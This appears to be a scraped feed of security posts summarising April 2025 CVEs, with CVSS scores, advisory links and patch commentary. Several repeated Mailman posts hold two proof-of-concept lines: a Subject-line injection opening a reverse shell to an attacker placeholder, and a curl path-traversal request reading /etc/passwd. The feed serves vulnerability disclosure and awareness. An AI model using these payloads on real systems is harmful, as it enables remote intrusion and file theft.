##Who doesn't like RCE in Viastat modems? Well here's two of them. Happy Friday.
https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6198
sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/R:U/V:C/RE:M/U:Red
The device exposes a web interface on ports TCP/3030 and TCP/9882. This web service runs lighttpd, which implements the “SNORE” interface. This interface is affected by a stack buffer overflow vulnerability due to insecure path parsing. An attacker with access to the LAN network interface could use a specially crafted HTTP request to exploit a buffer overflow on the modem.
https://nvd.nist.gov/vuln/detail/CVE-2024-6198
https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6199
sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:N/R:U/V:D/RE:M/U:Red
##An unauthenticated attacker on the WAN interface, with the ability to intercept Dynamic DNS (DDNS) traffic between DDNS services and the modem, could manipulate specific responses to include code that forces a buffer overflow on the modem. Customers that have not enabled Dynamic DNS on their modem are not vulnerable.
Remote Code Execution on Viasat Modems (CVE-2024-6198) https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6198
##updated 2025-04-25T15:31:21
1 posts
Go hack more AI shit.
TCPWave DDI 11.34P1C2 allows Remote Code Execution via Unrestricted File Upload (combined with Path Traversal).
https://github.com/Henkel-CyberVM/CVEs/blob/main/CVE-2025-43946/README.md
In case you don't know what TCPWave DDI is, this is the big banner on their homepage:
##Easy To Use DDI Powered with
Alice Chatbot
Core DDI with Advanced Threat Intelligence to mitigate risks
updated 2025-04-25T14:41:50
1 posts
A ../ in a popular reverse proxy and load balancer? Happy Monday! But at least we now know for sure how to pronounce it when we report it to the various teams.
https://github.com/traefik/traefik/security/advisories/GHSA-6p68-w45g-48j7
sev:HIGH 8.8 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P
##Traefik (pronounced traffic) is an HTTP reverse proxy and load balancer. In versions prior to 2.11.24, 3.3.6, and 3.4.0-rc2. There is a potential vulnerability in Traefik managing the requests using a PathPrefix, Path or PathRegex matcher. When Traefik is configured to route the requests to a backend using a matcher based on the path, if the URL contains a /../ in its path, it’s possible to target a backend, exposed using another router, by-passing the middlewares chain. This issue has been patched in versions 2.11.24, 3.3.6, and 3.4.0-rc2. A workaround involves adding a
PathRegexp
rule to the matcher to prevent matching a route with a/../
in the path.
updated 2025-04-25T09:31:56
1 posts
I thought quantum was supposed to save security or something?
sev:CRIT 9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
##Quantum StorNext Web GUI API before 7.2.4 allows potential Arbitrary Remote Code Execution (RCE) via upload of a file. This affects StorNext RYO before 7.2.4, StorNext Xcellis Workflow Director before 7.2.4, and ActiveScale Cold Storage.
updated 2025-04-24T21:41:39
1 posts
HTTP Smuggling in Python h11.
https://github.com/python-hyper/h11/security/advisories/GHSA-vqfr-h8mv-ghfj
sev:CRIT 9.1 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
##h11 is a Python implementation of HTTP/1.1. Prior to version 0.16.0, a leniency in h11's parsing of line terminators in chunked-coding message bodies can lead to request smuggling vulnerabilities under certain conditions. This issue has been patched in version 0.16.0. Since exploitation requires the combination of buggy h11 with a buggy (reverse) proxy, fixing either component is sufficient to mitigate this issue.
updated 2025-04-24T21:32:50
1 posts
Ooh, a BoF in Johnson Controls iStar Configuration Utility tool.
sev:CRIT 9.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Under certain circumstances the iSTAR Configuration Utility (ICU) tool could have a buffer overflow issue
https://nvd.nist.gov/vuln/detail/CVE-2025-26382
This other advisory from last June was also updated today.
sev:HIGH 8.8 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N
##Johnson Controls has confirmed a vulnerability impacting the Software House iSTAR Configuration Utility (ICU) tool for Software House iSTAR Pro, Edge, eX, Ultra and Ultra LT door controllers which may result in insecure communications.
updated 2025-04-24T21:31:54
2 posts
Johnson Controls reports critical vulnerability in ICU tool
A critical stack-based buffer overflow vulnerability (CVE-2025-26382, CVSS 9.8) in Johnson Controls' ICU tool affects versions prior to 6.9.5, allowing unauthenticated remote attackers to execute arbitrary code and potentially gain complete system control.
**If you are using Johnson Controls' ICU tool, the usual rules apply - Make sure it's isolated from the internet and accessible only from trusted networks. Then plan a patch, because every isolation can be breached given enough time.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/johnson-controls-reports-critical-vulnerability-in-icu-tool-g-p-n-0-s/gD2P6Ple2L
Ooh, a BoF in Johnson Controls iStar Configuration Utility tool.
sev:CRIT 9.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Under certain circumstances the iSTAR Configuration Utility (ICU) tool could have a buffer overflow issue
https://nvd.nist.gov/vuln/detail/CVE-2025-26382
This other advisory from last June was also updated today.
sev:HIGH 8.8 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N
##Johnson Controls has confirmed a vulnerability impacting the Software House iSTAR Configuration Utility (ICU) tool for Software House iSTAR Pro, Edge, eX, Ultra and Ultra LT door controllers which may result in insecure communications.
updated 2025-04-24T19:20:07
1 posts
I've heard of people around here using youtube-dl. If you use the Youtube-DLSharp wrapper for it, heads-up.
https://github.com/Bluegrams/YoutubeDLSharp/security/advisories/GHSA-2jh5-g5ch-43q5
sev:CRIT 9.2 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
##YoutubeDLSharp is a wrapper for the command-line video downloaders youtube-dl and yt-dlp. In versions starting from 1.0.0-beta4 and prior to 1.1.2, an unsafe conversion of arguments allows the injection of a malicious commands when starting
yt-dlp
from a commands prompt running on Windows OS with theUseWindowsEncodingWorkaround
value defined to true (default behavior). If a user is using built-in methods from the YoutubeDL.cs file, the value is true by default and a user cannot disable it from these methods. This issue has been patched in version 1.1.2.
updated 2025-04-24T18:32:12
2 posts
Heard of Rack, Ruby, or Infodraw lately? Well, some nasty Path Traversal and Log Manipulation bugs are doing the rounds again, and they're definitely something to watch out for.
First up, Rack's got a vulnerability in `Rack::Static` (that's CVE-2025-27610). Basically, it could let unwanted guests wander through directories where they have no business being. You *really* need to get that updated ASAP. Alternatively, if it works for your setup, just ditch `Rack::Static` altogether.
Then there's Infodraw MRS (CVE-2025-43928), and this one's a kicker: still *no* official patch available! 😬 Since this impacts video surveillance systems, your best bets for now involve taking affected systems offline if possible. If not, sticking them safely behind a VPN or locking things down tight with an IP whitelist should be top priorities.
It's worth remembering, automated scans often breeze right past issues like these. That's where manual testing truly shines – it's absolutely worth its weight in gold here! ☝️
So, what about you? Ever run into headaches with similar vulnerabilities? How are you keeping your own systems buttoned up against these kinds of threats? Let's talk!
##../ in LEA shit? Huh.
h/t @varbin
https://mint-secure.de/path-traversal-vulnerability-in-surveillance-software/
https://cfp.eh22.easterhegg.eu/eh22/talk/9UDXSE/
sev:MED 5.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
But the reporter disagrees, which seems to be a theme lately. They claim it should be: sev:HIGH 7.2 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
##In Infodraw Media Relay Service (MRS) 7.1.0.0, the MRS web server (on port 12654) allows reading arbitrary files via ../ directory traversal in the username field. Reading ServerParameters.xml may reveal administrator credentials in cleartext or with MD5 hashing.
updated 2025-04-24T18:32:10
1 posts
updated 2025-04-24T18:32:10
1 posts
updated 2025-04-24T18:32:10
1 posts
updated 2025-04-24T18:32:10
1 posts
updated 2025-04-24T16:36:11
1 posts
Another Apache vuln, this time in HttpClient.
https://lists.apache.org/thread/55xhs40ncqv97qvoocok44995xp5kqn8
##A bug in PSL validation logic in Apache HttpClient 5.4.x disables domain checks, affecting cookie management and host name verification. Discovered by the Apache HttpClient team. Fixed in the 5.4.3 release
updated 2025-04-24T16:22:37.117000
3 posts
2 repos
ICYMI this weekend:
Command intention via email subject in GNU Mailman as shipped in cPanel. Note the difference of CVSS metrics between the original disclosure and the CNA ( MITRE ).
https://github.com/0NYX-MY7H/CVE-2025-43920
Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.
PoC: Subject: ;bash -i >& /dev/tcp/ATTACKERIP/4444 0>&1
https://nvd.nist.gov/vuln/detail/CVE-2025-43920
There was also a nice ../ to go with it:
https://github.com/0NYX-MY7H/CVE-2025-43919
Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
GNU Mailman 2.1.39, as bundled with cPanel and WHM, contains a critical directory traversal vulnerability in the
/mailman/private/mailman
endpoint. Unauthenticated attackers can exploit this flaw to read arbitrary files on the server, such as/etc/passwd
or Mailman configuration files, due to insufficient input validation in the private.py CGI script. This vulnerability poses significant risks for information disclosure and can facilitate further attacks when combined with other exploits.
PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman
https://nvd.nist.gov/vuln/detail/CVE-2025-43919
There's also an "Unauthorized Mailing List Creation in GNU Mailman 2.1.39":
https://github.com/0NYX-MY7H/CVE-2025-43921
If I ran cPanel with Mailman, looking at the advisories themselves, I would treat it with the original CVSS scores in mind rather than the ones provided by MITRE here.
##Well if that command injection wasn't enough for you, how about a nice sev:CRIT
../ to go with it? Happy Easter.
https://github.com/0NYX-MY7H/CVE-2025-43919
There's also apparently a "Unauthorized Mailing List Creation in GNU Mailman 2.1.39" but the README on that one appears to be the one for the ../ so I don't have any details.
https://github.com/0NYX-MY7H/CVE-2025-43921
Edit to add the PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman
Command intention via email subject in GNU Mailman. lol. lmao. It's interesting to see the difference of CVSS metrics between the disclosure and the CNA ( MITRE ).
https://github.com/0NYX-MY7H/CVE-2025-43920
Per discloser: sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.
https://nvd.nist.gov/vuln/detail/CVE-2025-43920
There are a couple more in Mailman while we're here:
##updated 2025-04-24T16:20:36.953000
2 posts
1 repos
ICYMI this weekend:
Command intention via email subject in GNU Mailman as shipped in cPanel. Note the difference of CVSS metrics between the original disclosure and the CNA ( MITRE ).
https://github.com/0NYX-MY7H/CVE-2025-43920
Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.
PoC: Subject: ;bash -i >& /dev/tcp/ATTACKERIP/4444 0>&1
https://nvd.nist.gov/vuln/detail/CVE-2025-43920
There was also a nice ../ to go with it:
https://github.com/0NYX-MY7H/CVE-2025-43919
Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
GNU Mailman 2.1.39, as bundled with cPanel and WHM, contains a critical directory traversal vulnerability in the
/mailman/private/mailman
endpoint. Unauthenticated attackers can exploit this flaw to read arbitrary files on the server, such as/etc/passwd
or Mailman configuration files, due to insufficient input validation in the private.py CGI script. This vulnerability poses significant risks for information disclosure and can facilitate further attacks when combined with other exploits.
PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman
https://nvd.nist.gov/vuln/detail/CVE-2025-43919
There's also an "Unauthorized Mailing List Creation in GNU Mailman 2.1.39":
https://github.com/0NYX-MY7H/CVE-2025-43921
If I ran cPanel with Mailman, looking at the advisories themselves, I would treat it with the original CVSS scores in mind rather than the ones provided by MITRE here.
##Command intention via email subject in GNU Mailman. lol. lmao. It's interesting to see the difference of CVSS metrics between the disclosure and the CNA ( MITRE ).
https://github.com/0NYX-MY7H/CVE-2025-43920
Per discloser: sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.
https://nvd.nist.gov/vuln/detail/CVE-2025-43920
There are a couple more in Mailman while we're here:
##updated 2025-04-24T16:16:59.597000
3 posts
1 repos
ICYMI this weekend:
Command intention via email subject in GNU Mailman as shipped in cPanel. Note the difference of CVSS metrics between the original disclosure and the CNA ( MITRE ).
https://github.com/0NYX-MY7H/CVE-2025-43920
Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.
PoC: Subject: ;bash -i >& /dev/tcp/ATTACKERIP/4444 0>&1
https://nvd.nist.gov/vuln/detail/CVE-2025-43920
There was also a nice ../ to go with it:
https://github.com/0NYX-MY7H/CVE-2025-43919
Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
GNU Mailman 2.1.39, as bundled with cPanel and WHM, contains a critical directory traversal vulnerability in the
/mailman/private/mailman
endpoint. Unauthenticated attackers can exploit this flaw to read arbitrary files on the server, such as/etc/passwd
or Mailman configuration files, due to insufficient input validation in the private.py CGI script. This vulnerability poses significant risks for information disclosure and can facilitate further attacks when combined with other exploits.
PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman
https://nvd.nist.gov/vuln/detail/CVE-2025-43919
There's also an "Unauthorized Mailing List Creation in GNU Mailman 2.1.39":
https://github.com/0NYX-MY7H/CVE-2025-43921
If I ran cPanel with Mailman, looking at the advisories themselves, I would treat it with the original CVSS scores in mind rather than the ones provided by MITRE here.
##Well if that command injection wasn't enough for you, how about a nice sev:CRIT
../ to go with it? Happy Easter.
https://github.com/0NYX-MY7H/CVE-2025-43919
There's also apparently a "Unauthorized Mailing List Creation in GNU Mailman 2.1.39" but the README on that one appears to be the one for the ../ so I don't have any details.
https://github.com/0NYX-MY7H/CVE-2025-43921
Edit to add the PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman
Command intention via email subject in GNU Mailman. lol. lmao. It's interesting to see the difference of CVSS metrics between the disclosure and the CNA ( MITRE ).
https://github.com/0NYX-MY7H/CVE-2025-43920
Per discloser: sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N
GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.
https://nvd.nist.gov/vuln/detail/CVE-2025-43920
There are a couple more in Mailman while we're here:
##updated 2025-04-24T16:03:58
1 posts
DoS in tRPC.
https://github.com/trpc/trpc/security/advisories/GHSA-pj3v-9cm8-gvj8
sev:HIGH 8.7 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
##tRPC allows users to build & consume fully typesafe APIs without schemas or code generation. In versions starting from 11.0.0 to before 11.1.1, an unhandled error is thrown when validating invalid connectionParams which crashes a tRPC WebSocket server. This allows any unauthenticated user to crash a tRPC 11 WebSocket server. Any tRPC 11 server with WebSocket enabled with a createContext method set is vulnerable. This issue has been patched in version 11.1.1.
updated 2025-04-24T15:31:46
1 posts
LPE and DoS in Acronis Cyber Protect Cloud Agent (Windows).
https://security-advisory.acronis.com/advisories/SEC-8035
sev:MED 6.7 - CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H
Local privilege escalation due to insecure folder permissions. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.
https://nvd.nist.gov/vuln/detail/CVE-2025-30408
https://security-advisory.acronis.com/advisories/SEC-8148
sev:MED 5.5 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
##Denial of service due to allocation of resources without limits. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.
updated 2025-04-24T15:31:44
1 posts
I'm tired of soup, but this one is kind of fun.
##A flaw was found in libsoup. When libsoup clients encounter an HTTP redirect, they mistakenly send the HTTP Authorization header to the new host that the redirection points to. This allows the new host to impersonate the user to the original host that issued the redirect.
updated 2025-04-24T15:31:44
1 posts
LPE and DoS in Acronis Cyber Protect Cloud Agent (Windows).
https://security-advisory.acronis.com/advisories/SEC-8035
sev:MED 6.7 - CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H
Local privilege escalation due to insecure folder permissions. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.
https://nvd.nist.gov/vuln/detail/CVE-2025-30408
https://security-advisory.acronis.com/advisories/SEC-8148
sev:MED 5.5 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
##Denial of service due to allocation of resources without limits. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.
updated 2025-04-24T12:31:35
1 posts
This SQLi in Centreon Web is from a month ago but the CVE was published today.
sev:HIGH 7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
##Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon centreon-web (User configuration form modules) allows SQL Injection.
A user with high privileges is able to become administrator by intercepting the contact form request and altering its payload.
This issue affects Centreon: from 22.10.0 before 22.10.28, from 23.04.0 before 23.04.25, from 23.10.0 before 23.10.20, from 24.04.0 before 24.04.10, from 24.10.0 before 24.10.4.
updated 2025-04-24T09:30:40
1 posts
GitLab releases security patches for multiple Vulnerabilities
GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.
**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE) plan a quick patch cycle. While none of the flaws are scored as critical, the nature of GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/gitlab-releases-security-patches-for-multiple-vulnerabilities-9-a-u-d-v/gD2P6Ple2L
updated 2025-04-24T09:30:40
1 posts
GitLab releases security patches for multiple Vulnerabilities
GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.
**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE) plan a quick patch cycle. While none of the flaws are scored as critical, the nature of GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/gitlab-releases-security-patches-for-multiple-vulnerabilities-9-a-u-d-v/gD2P6Ple2L
updated 2025-04-24T09:30:40
1 posts
GitLab releases security patches for multiple Vulnerabilities
GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.
**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE) plan a quick patch cycle. While none of the flaws are scored as critical, the nature of GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/gitlab-releases-security-patches-for-multiple-vulnerabilities-9-a-u-d-v/gD2P6Ple2L
updated 2025-04-24T09:30:40
1 posts
Hardcoded keys in PHYSEC devices strikes again.
https://jvn.jp/en/jp/JVN84627857/
sev:MED 6.8 - CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
##Use of hard-coded cryptographic key vulnerability in i-PRO Configuration Tool affects the network system for i-PRO Co., Ltd. surveillance cameras and recorders. This vulnerability allows a local authenticated attacker to use the authentication information from the last connected surveillance cameras and recorders.
updated 2025-04-24T06:30:31
4 posts
Authenticated Remote Code Execution on USG FLEX H Series (CVE-2025-1731 / CVE-2025-1732) https://0xdeadc0de.xyz/blog/cve-2025-1731_cve-2025-1732
##@Dio9sys @da_667 Adding this link to the Zyxel vuln above: https://security.humanativaspa.it/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731/
##Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731) https://security.humanativaspa.it/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731/
##Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731)
“So we wait, this is our […]
🔗️ [Humanativaspa] https://link.is.it/ubmq0d
##updated 2025-04-24T03:31:38
1 posts
This is one of those CVEs that I think the score is higher than the actual risk to most orgs but IDK, we all have different use cases and configurations.
sev:HIGH 8.8 - CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
##Brocade Fabric OS versions starting with 9.1.0 have root access removed, however, a local user with admin privilege can potentially execute arbitrary code with full root privileges on Fabric OS versions 9.1.0 through 9.1.1d6.
updated 2025-04-24T03:31:38
1 posts
Here's an industrial networking vuln for @Dio9sys and @da_667 and whoever.
sev:MED 5.9 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
##Westermo WeOS 5 through 5.23.0 allows a reboot via a malformed ESP packet.
updated 2025-04-23T21:30:42
1 posts
SonicWALL SSLVPN DoS.
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0009
sev:HIGH 7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
##A Null Pointer Dereference vulnerability in the SonicOS SSLVPN Virtual office interface allows a remote, unauthenticated attacker to crash the firewall, potentially leading to a Denial-of-Service (DoS) condition.
updated 2025-04-23T19:15:38
1 posts
SQLi in XWiki.
https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-f69v-xrj8-rhxf
sev:CRIT 9.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
##XWiki is a generic wiki platform. In versions starting from 1.8 and prior to 15.10.16, 16.4.6, and 16.10.1, it is possible for a remote unauthenticated user to escape from the HQL execution context and perform a blind SQL injection to execute arbitrary SQL statements on the database backend, including when "Prevent unregistered users from viewing pages, regardless of the page rights" and "Prevent unregistered users from editing pages, regardless of the page rights" options are enabled. Depending on the used database backend, the attacker may be able to not only obtain confidential information such as password hashes from the database, but also execute UPDATE/INSERT/DELETE queries. This issue has been patched in versions 16.10.1, 16.4.6 and 15.10.16. There is no known workaround, other than upgrading XWiki.
updated 2025-04-23T18:31:07
1 posts
updated 2025-04-23T18:31:07
1 posts
updated 2025-04-23T18:31:06
1 posts
updated 2025-04-23T18:31:06
1 posts
updated 2025-04-23T18:31:00
1 posts
Arista NG Firewall XSS -> RCE.
https://www.zerodayinitiative.com/advisories/ZDI-25-181/
sev:HIGH 8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
##Arista NG Firewall User-Agent Cross-Site Scripting Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Arista NG Firewall. Minimal user interaction is required to exploit this vulnerability. The specific flaw exists within the processing of the User-Agent HTTP header. The issue results from the lack of proper validation of user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-24407.
updated 2025-04-23T15:32:02
1 posts
This is unlikely to impact anyone, but it's a CVE for Cray OS. In 2025. I like it.
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbcr04838en_us
sev:MED 5.1 -
CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
##A vulnerability in the kernel of the Cray Operating System (COS) could allow an attacker to perform a local Denial of Service (DoS) attack.
updated 2025-04-23T14:08:13.383000
1 posts
HTTP request smuggling in OpenResty lua-nginx-module. But even if you don't care about that, check out the blog post ( with PoC ). It has a cat that chases the cursor around the screen and I love it so much.
##updated 2025-04-23T14:08:13.383000
1 posts
Heads-up if you or your target run IBM Hardware Management Console.
https://www.ibm.com/support/pages/node/7231507
sev:CRIT 9.3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands locally due to improper validation of libraries of an untrusted source.
https://nvd.nist.gov/vuln/detail/CVE-2025-1950
https://www.ibm.com/support/pages/node/7231389
sev:HIGH 8.4 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
##IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands as a privileged user due to execution of commands with unnecessary privileges.
updated 2025-04-23T14:08:13.383000
1 posts
Hey @Dio9sys and @da_667 , y'all like sev:CRIT 9.8
vulns in cameras?
https://github.com/Yasha-ops/RCE-YiIOT
##updated 2025-04-23T14:08:13.383000
1 posts
Hey @Dio9sys and @da_667 , y'all like sev:CRIT 9.8
vulns in cameras?
https://github.com/Yasha-ops/RCE-YiIOT
##updated 2025-04-23T12:31:31
2 posts
📊⚠️ Data in danger!
We found an XSS vulnerability in Grafana with the help of SonarQube. Learn about the details in our latest blog post:
##Some of y'all use Grafana, right?
https://grafana.com/security/security-advisories/cve-2025-2703
sev:MED 6.8 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L
##The built-in XY Chart plugin is vulnerable to a DOM XSS vulnerability.
A user with Editor permissions is able to modify such a panel in order to make it execute arbitrary JavaScript.
updated 2025-04-23T09:33:37
1 posts
Ooh, more CODESYS.
https://certvde.com/en/advisories/VDE-2025-027/
sev:MED 5.3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
##An unauthenticated remote attacker can bypass the user management in CODESYS Visualization and read visualization template files or static elements by means of forced browsing.
updated 2025-04-23T06:31:26
1 posts
A couple CVEs in Axis Camera Station Pro.
https://www.axis.com/dam/public/e4/2e/b2/cve-2025-1056pdf-en-US-479106.pdf
sev:MED 6.1 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H
Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has identified an issue with a specific file that the server is using. A non-admin user can modify this file to either create files or change the content of files in an admin-protected location.
Axis has released a patched version for the highlighted flaw. Please
refer to the Axis security advisory for more information and solution.
https://nvd.nist.gov/vuln/detail/CVE-2025-1056
https://www.axis.com/dam/public/9d/fe/3f/cve-2025-0926pdf-en-US-479105.pdf
sev:MED 5.9 - CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H
